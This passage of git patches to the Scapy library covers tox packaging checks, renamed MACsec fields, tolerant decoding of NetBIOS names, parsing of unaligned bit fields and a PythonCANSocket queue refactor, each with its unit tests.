there's a scapy/VERSION file + _build_version(self.build_lib) setup( - cmdclass={'sdist': SDist}, + cmdclass={'sdist': SDist, 'build_py': BuildPy}, long_description=get_long_description(), long_description_content_type='text/markdown', ) diff --git a/tox.ini b/tox.ini index 7703d100f99..26272335d98 100644 --- a/tox.ini +++ b/tox.ini @@ -139,10 +139,22 @@ commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,* description = "Check Scapy code distribution" skip_install = true deps = twine - setuptools>=38.6.0 cmarkgfm -commands = python setup.py --quiet sdist - twine check dist/* + build +setenv = SCAPY_VERSION=3.0.0 +commands = python -m build + twine check --strict dist/* + + +[testenv:gitarchive] +description = "Check Scapy git archive" +skip_install = true +allowlist_externals = git +commands = git version + git archive HEAD -o {envtmpdir}/scapy.tar + python -m pip install {envtmpdir}/scapy.tar + # Below: remove current folder from path to force use of installed Scapy + python -c "import sys; sys.path.remove(''); import scapy; print(scapy._version_from_git_archive())" [testenv:flake8] From 3381b98fc5259a626c803197f77f5770a08c5376 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Fri, 14 Apr 2023 10:33:01 +0300 Subject: [PATCH 1006/1632] No longer use deprecated MACsec fields (#3981) It should make it easier to run scapy with -Xdev -Werror without getting deprecation warnings like ```sh DeprecationWarning: sci has been deprecated in favor of SCI since 2.4.4 ! ... DeprecationWarning: pn has been deprecated in favor of PN since 2.4.4 ! ``` The testsuite got updated too and ``` python3 -Xdev -Werror -m scapy.tools.UTscapy -P 'load_contrib("macsec")' -t test/contrib/macsec.uts ``` is green. It's a follow-up to d1fc7e3eb96083d09a18c66d26865bc4c2d089b1 --- scapy/contrib/macsec.py | 14 +++---- test/contrib/macsec.uts | 87 +++++++++++++++++++++-------------------- 2 files changed, 51 insertions(+), 50 deletions(-) diff --git a/scapy/contrib/macsec.py b/scapy/contrib/macsec.py index 5de694248d3..ac90972246a 100755 --- a/scapy/contrib/macsec.py +++ b/scapy/contrib/macsec.py @@ -79,11 +79,11 @@ def __init__(self, sci, an, pn, key, icvlen, encrypt, send_sci, xpn_en=False, ss def make_iv(self, pkt): """generate an IV for the packet""" if self.xpn_en: - tmp_pn = (self.pn & 0xFFFFFFFF00000000) | (pkt[MACsec].pn & 0xFFFFFFFF) # noqa: E501 + tmp_pn = (self.pn & 0xFFFFFFFF00000000) | (pkt[MACsec].PN & 0xFFFFFFFF) # noqa: E501 tmp_iv = self.ssci + struct.pack('!Q', tmp_pn) return bytes(bytearray([a ^ b for a, b in zip(bytearray(tmp_iv), bytearray(self.salt))])) # noqa: E501 else: - return self.sci + struct.pack('!I', pkt[MACsec].pn) + return self.sci + struct.pack('!I', pkt[MACsec].PN) @staticmethod def split_pkt(pkt, assoclen, icvlen=0): @@ -124,11 +124,11 @@ def encap(self, pkt): hdr = copy.deepcopy(pkt) payload = hdr.payload del hdr.payload - tag = MACsec(sci=self.sci, an=self.an, + tag = MACsec(SCI=self.sci, AN=self.an, SC=self.send_sci, E=self.e_bit(), C=self.c_bit(), - shortlen=MACsecSA.shortlen(pkt), - pn=(self.pn & 0xFFFFFFFF), type=pkt.type) + SL=MACsecSA.shortlen(pkt), + PN=(self.pn & 0xFFFFFFFF), type=pkt.type) hdr.type = ETH_P_MACSEC return hdr / tag / payload @@ -241,9 +241,9 @@ class MACsec(Packet): lambda pkt: "type" in pkt.fields)] def mysummary(self): - summary = self.sprintf("an=%MACsec.an%, pn=%MACsec.pn%") + summary = self.sprintf("AN=%MACsec.AN%, PN=%MACsec.PN%") if self.SC: - summary += self.sprintf(", sci=%MACsec.sci%") + summary += self.sprintf(", SCI=%MACsec.SCI%") if self.type is not None: summary += self.sprintf(", %MACsec.type%") return summary diff --git a/test/contrib/macsec.uts b/test/contrib/macsec.uts index 14b59cc0b49..dd0ab123cbd 100755 --- a/test/contrib/macsec.uts +++ b/test/contrib/macsec.uts @@ -14,13 +14,14 @@ m = sa.encap(p) assert m.type == ETH_P_MACSEC assert m[MACsec].type == ETH_P_IP assert len(m) == len(p) + 16 -assert m[MACsec].an == 0 -assert m[MACsec].pn == 100 -assert m[MACsec].shortlen == 0 +assert m[MACsec].AN == 0 +assert m[MACsec].PN == 100 +assert m[MACsec].SL == 0 assert m[MACsec].SC assert m[MACsec].E assert m[MACsec].C -assert m[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert m[MACsec].SCI == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert m[MACsec].mysummary() == r"AN=0, PN=100, SCI='RT\x00\x13\x01V\x00\x01', IPv4" = MACsec - basic encryption - encrypted sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) @@ -30,13 +31,13 @@ e = sa.encrypt(m) assert e.type == ETH_P_MACSEC assert e[MACsec].type == None assert len(e) == len(p) + 16 + 16 -assert e[MACsec].an == 0 -assert e[MACsec].pn == 100 -assert e[MACsec].shortlen == 0 +assert e[MACsec].AN == 0 +assert e[MACsec].PN == 100 +assert e[MACsec].SL == 0 assert e[MACsec].SC assert e[MACsec].E assert e[MACsec].C -assert e[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert e[MACsec].SCI == b'\x52\x54\x00\x13\x01\x56\x00\x01' = MACsec - basic decryption - encrypted sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) @@ -47,13 +48,13 @@ d = sa.decrypt(e) assert d.type == ETH_P_MACSEC assert d[MACsec].type == ETH_P_IP assert len(d) == len(m) -assert d[MACsec].an == 0 -assert d[MACsec].pn == 100 -assert d[MACsec].shortlen == 0 +assert d[MACsec].AN == 0 +assert d[MACsec].PN == 100 +assert d[MACsec].SL == 0 assert d[MACsec].SC assert d[MACsec].E assert d[MACsec].C -assert d[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert d[MACsec].SCI == b'\x52\x54\x00\x13\x01\x56\x00\x01' assert raw(d) == raw(m) = MACsec - basic decap - decrypted @@ -74,13 +75,13 @@ m = sa.encap(p) assert m.type == ETH_P_MACSEC assert m[MACsec].type == ETH_P_IP assert len(m) == len(p) + 16 -assert m[MACsec].an == 0 -assert m[MACsec].pn == 200 -assert m[MACsec].shortlen == 0 +assert m[MACsec].AN == 0 +assert m[MACsec].PN == 200 +assert m[MACsec].SL == 0 assert m[MACsec].SC assert not m[MACsec].E assert not m[MACsec].C -assert m[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert m[MACsec].SCI == b'\x52\x54\x00\x13\x01\x56\x00\x01' = MACsec - basic encryption - integrity only sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) @@ -90,13 +91,13 @@ e = sa.encrypt(m) assert m.type == ETH_P_MACSEC assert e[MACsec].type == None assert len(e) == len(p) + 16 + 16 -assert e[MACsec].an == 0 -assert e[MACsec].pn == 200 -assert e[MACsec].shortlen == 0 +assert e[MACsec].AN == 0 +assert e[MACsec].PN == 200 +assert e[MACsec].SL == 0 assert e[MACsec].SC assert not e[MACsec].E assert not e[MACsec].C -assert e[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert e[MACsec].SCI == b'\x52\x54\x00\x13\x01\x56\x00\x01' assert raw(e)[:-16] == raw(m) = MACsec - basic decryption - integrity only @@ -108,13 +109,13 @@ d = sa.decrypt(e) assert d.type == ETH_P_MACSEC assert d[MACsec].type == ETH_P_IP assert len(d) == len(m) -assert d[MACsec].an == 0 -assert d[MACsec].pn == 200 -assert d[MACsec].shortlen == 0 +assert d[MACsec].AN == 0 +assert d[MACsec].PN == 200 +assert d[MACsec].SL == 0 assert d[MACsec].SC assert not d[MACsec].E assert not d[MACsec].C -assert d[MACsec].sci == b'\x52\x54\x00\x13\x01\x56\x00\x01' +assert d[MACsec].SCI == b'\x52\x54\x00\x13\x01\x56\x00\x01' assert raw(d) == raw(m) = MACsec - basic decap - integrity only @@ -130,71 +131,71 @@ assert raw(r) == raw(p) sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd') m = sa.encap(p) -assert m[MACsec].shortlen == 2 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 2 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 10 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 8) m = sa.encap(p) -assert m[MACsec].shortlen == 10 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 10 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 18 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 16) m = sa.encap(p) -assert m[MACsec].shortlen == 18 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 18 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 32 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 30) m = sa.encap(p) -assert m[MACsec].shortlen == 32 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 32 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 40 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 38) m = sa.encap(p) -assert m[MACsec].shortlen == 40 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 40 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 47 sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 45) m = sa.encap(p) -assert m[MACsec].shortlen == 47 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 47 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 0 (48) sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=1) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 45 + "y") m = sa.encap(p) -assert m[MACsec].shortlen == 0 +assert m[MACsec].SL == 0 = MACsec - encap - shortlen 2/nosci sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=0) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd') m = sa.encap(p) -assert m[MACsec].shortlen == 2 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 2 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 32/nosci sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=0) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 30) m = sa.encap(p) -assert m[MACsec].shortlen == 32 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 32 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - encap - shortlen 47/nosci sa = MACsecSA(sci=0x5254001301560001, an=0, pn=200, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=0, send_sci=0) p = Ether(src='aa:aa:aa:bb:bb:bb', dst='cc:cc:cc:dd:dd:dd')/Raw("x" * 45) m = sa.encap(p) -assert m[MACsec].shortlen == 47 -assert len(m) == m[MACsec].shortlen + 20 + (8 if sa.send_sci else 0) +assert m[MACsec].SL == 47 +assert len(m) == m[MACsec].SL + 20 + (8 if sa.send_sci else 0) = MACsec - authenticate From d36aaf697c5022f59c8ce00909ec37c2745ae85a Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Fri, 14 Apr 2023 21:41:39 +0300 Subject: [PATCH 1007/1632] Tolerate decoding errors in NetBIOS names (#3971) Fixes: ``` File scapy/scapy/sendrecv.py:1438, in tshark(*args, **kargs) File scapy/scapy/sendrecv.py:1310, in sniff(*args, **kwargs) File scapy/scapy/sendrecv.py:1253, in AsyncSniffer._run(self, count, store, offline, quiet, prn, lfilter, L2socket, timeout, opened_socket, stop_filter, iface, started_callback, session, session_kwargs, **karg) File scapy/scapy/sessions.py:109, in DefaultSession.on_packet_received(self, pkt) File scapy/scapy/sendrecv.py:1435, in tshark.._cb(pkt) File scapy/scapy/packet.py:1637, in Packet.summary(self, intern) File scapy/scapy/packet.py:1611, in Packet._do_summary(self) File scapy/scapy/packet.py:1611, in Packet._do_summary(self) [... skipping similar frames: Packet._do_summary at line 1611 (1 times)] File scapy/scapy/packet.py:1611, in Packet._do_summary(self) File scapy/scapy/packet.py:1614, in Packet._do_summary(self) File scapy/scapy/layers/netbios.py:145, in NBNSQueryRequest.mysummary(self) 143 def mysummary(self): 144 return "NBNSQueryRequest who has '\\\\%s'" % ( --> 145 self.QUESTION_NAME.strip().decode() 146 ) UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 0: invalid start byte ``` It's a follow-up to c17140a419e3e4496706faa1cb9753816a6c586b --- scapy/layers/netbios.py | 6 +++--- test/scapy/layers/netbios.uts | 13 +++++++++++++ 2 files changed, 16 insertions(+), 3 deletions(-) diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 1715590d28c..5986528784a 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -142,7 +142,7 @@ class NBNSQueryRequest(Packet): def mysummary(self): return "NBNSQueryRequest who has '\\\\%s'" % ( - self.QUESTION_NAME.strip().decode() + self.QUESTION_NAME.strip().decode(errors="backslashreplace") ) @@ -181,7 +181,7 @@ def mysummary(self): if not self.ADDR_ENTRY: return "NBNSQueryResponse" return "NBNSQueryResponse '\\\\%s' is at %s" % ( - self.RR_NAME.strip().decode(), + self.RR_NAME.strip().decode(errors="backslashreplace"), self.ADDR_ENTRY[0].NB_ADDRESS ) @@ -199,7 +199,7 @@ class NBNSNodeStatusRequest(NBNSQueryRequest): def mysummary(self): return "NBNSNodeStatusRequest who has '\\\\%s'" % ( - self.QUESTION_NAME.strip().decode() + self.QUESTION_NAME.strip().decode(errors="backslashreplace") ) diff --git a/test/scapy/layers/netbios.uts b/test/scapy/layers/netbios.uts index 9f4ff76c036..5c091b4e6a3 100644 --- a/test/scapy/layers/netbios.uts +++ b/test/scapy/layers/netbios.uts @@ -15,9 +15,13 @@ assert raw(z) == b'\x00\x00\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00 FEEFFDFEDBCA pkt = IP(dst='192.168.0.255')/UDP(sport=137, dport='netbios_ns')/z pkt = IP(raw(pkt)) assert pkt.QUESTION_NAME == b'TEST1 ' +assert pkt[NBNSQueryRequest].mysummary() == r"NBNSQueryRequest who has '\\TEST1'" assert NBNSQueryRequest in NBNSHeader(raw(z)) +z = NBNSQueryRequest(b' PPCACACACACACACACACACACACACACAAA\x00\x00 \x00\x01') +assert z.mysummary() == r"NBNSQueryRequest who has '\\\xff'" + = NBNSQueryResponse - build & dissect z = NBNSHeader()/NBNSQueryResponse(RR_NAME="FRED", ADDR_ENTRY=[NBNS_ADD_ENTRY(NB_ADDRESS="192.168.0.13")]) @@ -26,6 +30,11 @@ assert raw(z) == b'\x00\x00\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00 EGFCEFEECACA pkt = NBNSHeader(raw(z)) assert NBNSQueryResponse in pkt assert pkt.ADDR_ENTRY[0].NB_ADDRESS == "192.168.0.13" +assert pkt[NBNSQueryResponse].mysummary() == r"NBNSQueryResponse '\\FRED' is at 192.168.0.13" + +z = NBNSQueryResponse(b' PPFCEFEECACACACACACACACACACACAAA\x00\x00 \x00\x01\x00\x04\x93\xe0\x00\x06\x00\x00\xc0\xa8\x00\r') +assert z.mysummary() == r"NBNSQueryResponse '\\\xffRED' is at 192.168.0.13" + = NBNSNodeStatusResponse - build & dissect @@ -39,11 +48,15 @@ assert NBNSNodeStatusResponse in pkt pkt = UDP()/NBNSHeader()/NBNSNodeStatusRequest() assert raw(pkt.payload) == b'\x00\x00\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01' +assert pkt[NBNSNodeStatusRequest].mysummary() == "NBNSNodeStatusRequest who has '\\\\*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'" resp = UDP(b'\x00\x89\x00\x89\x00\xc9v>\x00\x00\x84\x00\x00\x00\x00\x01\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01\x00\x00\x00\x00\x00\x89\x05DOMAIN \x00\x84\x00SRV1 \x00\x04\x00DOMAIN \x1c\x84\x00SRV1 \x04\x00DOMAIN \x1b\x04\x00RT\x00iX\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') assert [x.NETBIOS_NAME.strip() for x in resp.NODE_NAME] == [b'DOMAIN', b'SRV1', b'DOMAIN', b'SRV1', b'DOMAIN'] assert resp.answers(pkt) +z = NBNSNodeStatusRequest(b' PPCACACACACACACACACACACACACACAAA\x00\x00!\x00\x01') +assert z.mysummary() == r"NBNSNodeStatusRequest who has '\\\xff'" + = NBNSWackResponse - build & dissect z = NBNSHeader()/NBNSWackResponse(RR_NAME="SARAH") From 8ae53f098098db444d6fa76fefdf5adbda08a368 Mon Sep 17 00:00:00 2001 From: Steven Van Acker Date: Sat, 15 Apr 2023 12:37:29 +0200 Subject: [PATCH 1008/1632] fix parsing when data is unaligned (#3984) --- scapy/fields.py | 14 ++++++++++-- scapy/packet.py | 6 ++++- test/fields.uts | 58 +++++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 75 insertions(+), 3 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 4e408033010..c0f89b6e098 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1768,7 +1768,12 @@ def getfield(self, pkt, s): else: remain = b"" lst.append(p) - return remain + ret, lst + + if isinstance(remain, tuple): + remain, nb = remain + return (remain + ret, nb), lst + else: + return remain + ret, lst def i2m(self, pkt, # type: Optional[Packet] @@ -2070,7 +2075,12 @@ def getfield(self, c -= 1 s, v = self.field.getfield(pkt, s) val.append(v) - return s + ret, val + + if isinstance(s, tuple): + s, bn = s + return (s + ret, bn), val + else: + return s + ret, val class FieldLenField(Field[int, int]): diff --git a/scapy/packet.py b/scapy/packet.py index 283e3364172..31f8bc6ea1c 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1881,7 +1881,11 @@ class Raw(Packet): def __init__(self, _pkt=b"", *args, **kwargs): # type: (bytes, *Any, **Any) -> None if _pkt and not isinstance(_pkt, bytes): - _pkt = bytes_encode(_pkt) + if isinstance(_pkt, tuple): + _pkt, bn = _pkt + _pkt = bytes_encode(_pkt), bn + else: + _pkt = bytes_encode(_pkt) super(Raw, self).__init__(_pkt, *args, **kwargs) def answers(self, other): diff --git a/test/fields.uts b/test/fields.uts index 4e2ba690e3b..f7e3c2019c7 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -362,6 +362,20 @@ p = TestFLF(struct.pack("!BIII",3,1234,2345,12345678)) p assert p.len == 3 and p.lst == [1234,2345,12345678] += Disassemble unaligned +~ field +import struct +class TestFLFUnaligned(Packet): + name="test" + fields_desc = [ BitFieldLenField("len", None, 3, count_of="lst"), + FieldListField("lst", None, XBitField("elt",0,8), count_from=lambda pkt:pkt.len), + BitField("ignore", None, 5), + ] + +p = TestFLFUnaligned(b"\x68\x28\x48\x6a") +p +assert p.len == 3 and p.lst == [0x41,0x42,0x43] and p.ignore == 0xa + = Manipulate ~ field a = TestFLF(lst=[4]) @@ -2244,3 +2258,47 @@ mp = MockPacket(0) f = XStrField('test', None) x = f.i2repr(mp, RandBin()) assert x == '' + +############ +############ ++ Raw() tests + += unaligned data + +p = Raw(b"abc") +p + +offsetdata = bytes.fromhex("0" + p.load.hex() + "0") + +p = Raw((offsetdata, 4)) +p + +############ +############ ++ PacketListField() tests + += unaligned data + +class PInner(Packet): + name = "PInner" + fields_desc = [ + BitField("x", 0, 8), + ] + def extract_padding(self, s): + return '', s + +class POuter(Packet): + name = "POuter" + fields_desc = [ + BitField("indent", 0, 4), + BitFieldLenField("pcount", None, 8, count_of="plist"), + PacketListField("plist", None, PInner, + count_from=lambda pkt: pkt.pcount), + ] + +p = POuter(b"\xf0\x44\x14\x24\x34\x40") +p + +assert p.indent == 0xf +assert p.pcount == 4 +assert [p.x for p in p.plist] == [0x41, 0x42, 0x43, 0x44] From 16e52b19dae3c36212d4056d58da8865ab94c44d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 17 Apr 2023 10:53:30 +0200 Subject: [PATCH 1009/1632] Refactoring of PythonCANSocket (#3928) * Refactoring of PythonCANSocket This commit speeds up the internal handling of messages Co-authored-by: Enrico Pozzobon * try to install vcan * add ubuntu-18.04 to unittest.yml to test VCAN on linux * fix canfd unit test * Update cansocket_python_can.py real-world ECU fixes * fix flake8 * add scanner tag to gmlanutils tests * debugging * improve CANFD * fix flake8 * update unit test * try to fix unit test * try to fix unit test * try to fix unit test * fix comments * add tags to ubuntu machine * try to run vcan on ubuntu 20.04 * try to run vcan on ubuntu 20.04 * fix workflow * add vcan tests * add not_pypy to test/contrib/canfdsocket_python_can.uts * fix tests * remove ubuntu 20.04 machine --------- Co-authored-by: Nils Weiss Co-authored-by: Enrico Pozzobon Co-authored-by: Nils Weiss --- .config/ci/install.sh | 2 +- scapy/contrib/cansocket_python_can.py | 118 ++++++++---------- scapy/layers/can.py | 33 +++-- test/contrib/automotive/gm/gmlanutils.uts | 1 + .../automotive/scanner/uds_scanner.uts | 3 +- test/contrib/canfdsocket_native.uts | 15 ++- test/contrib/canfdsocket_python_can.uts | 5 +- test/contrib/cansocket_python_can.uts | 2 +- 8 files changed, 96 insertions(+), 83 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index f33d7b3ecda..16ef0075393 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -29,7 +29,7 @@ then sudo apt-get update sudo apt-get -qy install tshark net-tools || exit 1 sudo apt-get -qy install can-utils || exit 1 - + sudo apt-get -qy install linux-modules-extra-$(uname -r) || exit 1 # Make sure libpcap is installed if [ ! -z $SCAPY_USE_LIBPCAP ] then diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index 0e5e3011222..4c08e394d13 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -16,7 +16,7 @@ from functools import reduce from operator import add -import queue +from collections import deque from scapy.config import conf from scapy.supersocket import SuperSocket @@ -24,7 +24,7 @@ from scapy.packet import Packet from scapy.error import warning from scapy.compat import List, Type, Tuple, Dict, Any, \ - Optional, cast, orb + Optional, cast from can import Message as can_Message from can import CanError as can_CanError @@ -34,46 +34,6 @@ __all__ = ["CANSocket", "PythonCANSocket"] -class PriotizedCanMessage(object): - """Helper object for comparison of CAN messages. If the timestamps of two - messages are equal, the counter value of a priority counter, is used - for comparison. It's only important that this priority counter always - get increased for every CAN message in the receive heapq. This compensates - a low resolution of `time.time()` on some operating systems. - """ - def __init__(self, msg, count): - # type: (can_Message, int) -> None - self.msg = msg - self.count = count - - def __eq__(self, other): - # type: (Any) -> bool - if not isinstance(other, PriotizedCanMessage): - return False - return self.msg.timestamp == other.msg.timestamp and \ - self.count == other.count - - def __lt__(self, other): - # type: (Any) -> bool - if not isinstance(other, PriotizedCanMessage): - return False - return self.msg.timestamp < other.msg.timestamp or \ - (self.msg.timestamp == other.msg.timestamp and - self.count < other.count) - - def __le__(self, other): - # type: (Any) -> bool - return self == other or self < other - - def __gt__(self, other): - # type: (Any) -> bool - return not self <= other - - def __ge__(self, other): - # type: (Any) -> bool - return not self < other - - class SocketMapper: """Internal Helper class to map a python-can bus object to a list of SocketWrapper instances @@ -95,19 +55,23 @@ def mux(self): object. If a message is received, this message gets forwarded to all receive queues of the SocketWrapper objects. """ + msgs = [] while True: - prio_count = 0 try: msg = self.bus.recv(timeout=0) if msg is None: - return - for sock in self.sockets: - if sock._matches_filters(msg): - prio_count += 1 - sock.rx_queue.put(PriotizedCanMessage(msg, prio_count)) + break + else: + msgs.append(msg) except Exception as e: warning("[MUX] python-can exception caught: %s" % e) + for sock in self.sockets: + with sock.lock: + for msg in msgs: + if sock._matches_filters(msg): + sock.rx_queue.append(msg) + class _SocketsPool(object): """Helper class to organize all SocketWrapper and SocketMapper objects""" @@ -115,9 +79,10 @@ def __init__(self): # type: () -> None self.pool = dict() # type: Dict[str, SocketMapper] self.pool_mutex = threading.Lock() + self.last_call = 0.0 - def internal_send(self, sender, msg, prio=0): - # type: (SocketWrapper, can_Message, int) -> None + def internal_send(self, sender, msg): + # type: (SocketWrapper, can_Message) -> None """Internal send function. A given SocketWrapper wants to send a CAN message. The python-can @@ -129,7 +94,6 @@ def internal_send(self, sender, msg, prio=0): :param sender: SocketWrapper which initiated a send of a CAN message :param msg: CAN message to be sent - :param prio: Priority count for internal heapq """ if sender.name is None: raise TypeError("SocketWrapper.name should never be None") @@ -144,7 +108,8 @@ def internal_send(self, sender, msg, prio=0): if not sock._matches_filters(msg): continue - sock.rx_queue.put(PriotizedCanMessage(msg, prio)) + with sock.lock: + sock.rx_queue.append(msg) except KeyError: warning("[SND] Socket %s not found in pool" % sender.name) except can_CanError as e: @@ -155,9 +120,15 @@ def multiplex_rx_packets(self): """This calls the mux() function of all SocketMapper objects in this SocketPool """ + if time.monotonic() - self.last_call < 0.001: + # Avoid starvation if multiple threads are doing selects, since + # this object is singleton and all python-CAN sockets are using + # the same instance and locking the same locks. + return with self.pool_mutex: for t in self.pool.values(): t.mux() + self.last_call = time.monotonic() def register(self, socket, *args, **kwargs): # type: (SocketWrapper, Tuple[Any, ...], Dict[str, Any]) -> None @@ -228,9 +199,9 @@ def __init__(self, *args, **kwargs): :param kwargs: Keyword arguments for the python-can Bus object """ super(SocketWrapper, self).__init__(*args, **kwargs) - self.rx_queue = queue.PriorityQueue() # type: queue.PriorityQueue[PriotizedCanMessage] # noqa: E501 + self.lock = threading.Lock() + self.rx_queue = deque() # type: deque[can_Message] self.name = None # type: Optional[str] - self.prio_counter = 0 SocketsPool.register(self, *args, **kwargs) def _recv_internal(self, timeout): @@ -244,13 +215,19 @@ def _recv_internal(self, timeout): :return: Returns a tuple of either a can_Message or None and a bool to indicate if filtering was already applied. """ - SocketsPool.multiplex_rx_packets() - try: - pm = self.rx_queue.get(block=True, timeout=timeout) - return pm.msg, True - except queue.Empty: + if not self.rx_queue: + # Early return without locking if it looks like rx_queue is empty return None, True + with self.lock: + # It could be that 2 threads are using this same socket, so it's + # necessary to check again if the queue was emptied between the + # previous check and now + if len(self.rx_queue) == 0: + return None, True + msg = self.rx_queue.popleft() + return msg, True + def send(self, msg, timeout=None): # type: (can_Message, Optional[int]) -> None """Send function, following the ``can_BusABC`` interface of python-can. @@ -258,8 +235,7 @@ def send(self, msg, timeout=None): :param msg: Message to be sent. :param timeout: Not used. """ - self.prio_counter += 1 - SocketsPool.internal_send(self, msg, self.prio_counter) + SocketsPool.internal_send(self, msg) def shutdown(self): # type: () -> None @@ -311,9 +287,9 @@ def send(self, x): is_extended_id=x.flags == 0x4, is_error_frame=x.flags == 0x1, arbitration_id=x.identifier, - is_fd=orb(bx[5]) & 4 > 0, - error_state_indicator=orb(bx[5]) & 2 > 0, - bitrate_switch=orb(bx[5]) & 1 > 0, + is_fd=bx[5] & 4 > 0, + error_state_indicator=bx[5] & 2 > 0, + bitrate_switch=bx[5] & 1 > 0, dlc=x.length, data=bx[8:]) msg.timestamp = time.time() @@ -334,9 +310,19 @@ def select(sockets, remain=conf.recv_poll_rate): :returns: an array 